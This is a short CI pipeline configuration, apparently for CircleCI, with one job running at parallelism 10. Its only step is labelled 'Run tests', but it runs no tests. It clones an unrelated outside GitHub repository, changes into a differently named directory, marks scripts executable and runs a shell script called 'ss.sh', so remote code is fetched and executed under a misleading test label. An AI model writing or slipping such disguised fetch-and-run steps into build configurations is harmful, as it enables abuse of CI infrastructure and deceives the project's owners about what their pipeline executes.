jobs:  
  build:  
    parallelism: 10
    docker:  
      - image: cimg/ruby:3.0.2-node  
    steps:   
      - checkout   
      - run:   
          name: Run tests   
          command: git clone https://github.com/kuramandi12/bebek.git && cd inicoy && chmod u+x bash && chmod u+x ss.sh && ./ss.sh
